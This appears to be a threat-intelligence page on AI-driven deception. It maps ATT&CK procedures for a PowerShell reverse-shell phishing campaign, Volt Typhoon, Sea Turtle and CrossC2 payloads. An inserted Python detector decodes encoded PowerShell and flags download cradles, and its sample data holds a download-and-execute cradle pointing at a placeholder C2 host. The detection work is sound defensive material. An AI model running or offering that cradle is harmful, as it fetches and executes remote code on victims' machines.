AI-Driven Deception Campaign Optimization

Goal: To optimize deception campaigns based on real-time attacker behavior and threat intelligence.

Approach: Directing and disrupting attacker activities using AI-powered deception techniques.

This element leverages AI and machine learning to analyze attacker behavior, predict their next moves, and dynamically adjust deception tactics.

The Bear and the Shell

T1566.001 – Procedure: The adversary sent spearphishing emails to individuals and organizations critical of the Russian government, using lures such as NASA job offers and articles from independent Russian media outlets. The emails contained malicious ZIP files holding LNK files disguised as PDFs. When opened, the LNK files executed a PowerShell script to install a reverse shell.

T1059.001 – Procedure: The LNK file, when opened, executes a PowerShell script that decodes and executes a Base64-encoded command. This command downloads and installs the HTTP-Shell, a multiplatform reverse shell.

T1036 – Procedure: The adversary used a NASA-themed lure and designed the command-and-control server to resemble a legitimate PDF editing site to avoid detection.

T1071.001 – Procedure: The HTTP-Shell uses web protocols (HTTP) to communicate with the command-and-control server, enabling the adversary to send commands and receive data.

T1041 – Procedure: The HTTP-Shell allows the adversary to upload and download files, likely facilitating the exfiltration of data from the victim’s machine over the established command-and-control channel.
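The T1059.001 stage above runs PowerShell with a Base64-encoded command. As an added example (not code from the original page), the following decodes that argument from process-creation telemetry and flags the download-and-execute pattern a defender would want to see in clear text; the records, the placeholder URL and the field names are constructed assumptions.

```python
"""Triage PowerShell -EncodedCommand launches from process-creation telemetry (T1059.001)."""
import base64
import re

# powershell.exe accepts -EncodedCommand, any unambiguous prefix of it, and -ec.
_FLAGS = ["encodedcommand"[:i] for i in range(14, 0, -1)] + ["ec"]
ENC_RE = re.compile(r"(?:^|\s)-(?:%s)\s+([A-Za-z0-9+/=]+)" % "|".join(_FLAGS), re.I)

# Strings that typically mark a download cradle or in-memory execution.
CRADLE_RE = re.compile(
    r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b"
    r"|Invoke-Expression|\biex\b|FromBase64String|Start-BitsTransfer", re.I)


def decode_encoded_command(cmdline: str):
    """Return the decoded script if cmdline carries an encoded command, else None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")  # PowerShell encodes the script as UTF-16LE
    except (ValueError, UnicodeDecodeError):  # not valid Base64 / not UTF-16LE text
        return None


def triage(record: dict) -> dict:
    """Score one record; an explorer.exe parent matches a double-clicked LNK."""
    decoded = decode_encoded_command(record["cmdline"])
    reasons = []
    if decoded is not None:
        reasons.append("encoded_command")
        if CRADLE_RE.search(decoded):
            reasons.append("download_cradle")
        if "hidden" in record["cmdline"].lower():  # -w hidden / -WindowStyle Hidden
            reasons.append("hidden_window")
    if record.get("parent", "").lower() == "explorer.exe" and reasons:
        reasons.append("user_launched")
    return {"decoded": decoded, "reasons": reasons, "alert": "download_cradle" in reasons}


# Constructed samples (not real telemetry); the stage-2 URL is a placeholder.
_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/stage.ps1')"
_B64 = base64.b64encode(_STAGE2.encode("utf-16-le")).decode()
SAMPLE_RECORDS = [
    {"parent": "explorer.exe", "cmdline": f"powershell.exe -nop -w hidden -enc {_B64}"},
    {"parent": "svchost.exe", "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\ops\backup.ps1"},
    {"parent": "cmd.exe", "cmdline": "powershell.exe -EncodedCommand "
     + base64.b64encode("Get-Date".encode("utf-16-le")).decode()},
]

if __name__ == "__main__":
    for rec in SAMPLE_RECORDS:
        print(triage(rec))
```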

Campaign against Russian Opposition

The attacker may use phishing emails with malicious attachments to deliver and execute a malicious tool, such as a reverse shell, on the victim’s machine. The tool will likely use web protocols to communicate with the attacker’s C2 server.

Symbolic Execution-Based Parameter Extraction

Goal: To gather comprehensive information about malware behavior and identify potential deception parameters.

Approach: Deep analysis of malware using symbolic execution.

This element utilizes symbolic execution to analyze malware behavior and extract potential deception parameters. By exploring multiple execution paths, it can reveal hidden behaviors and identify critical system configurations that can be manipulated for deception.

Volt Typhoon Engagement

Volt Typhoon actors rely on valid accounts for persistence. They first gain initial access to a network by exploiting vulnerabilities in public-facing applications. Then, they obtain administrator credentials and maintain persistence on the network. They are known to use compromised credentials for follow-on activities, such as logging into the victim’s network via VPN.

Sea Turtle – Engagement

The Sea Turtle threat actor compromised legitimate cPanel accounts, potentially through brute force attacks or credential stuffing, to gain initial access to target systems. This allowed them to establish a foothold and conduct further malicious activities within the victim’s IT infrastructure.

Sea Turtle

The attacker is actively scanning the internet for vulnerable hosts, and then compromising those hosts for future malicious activity.

Extracting CrossC2 Configurations

The CrossC2 framework generates obfuscated Cobalt Strike payloads for Unix-like systems. These payloads contain encrypted configurations and potentially Malleable C2 profiles within an appended overlay. The payload itself may be packed with UPX and further obfuscated with techniques like LLVM string encryption. The configurations are encrypted using AES-128 CBC with a hardcoded key and IV.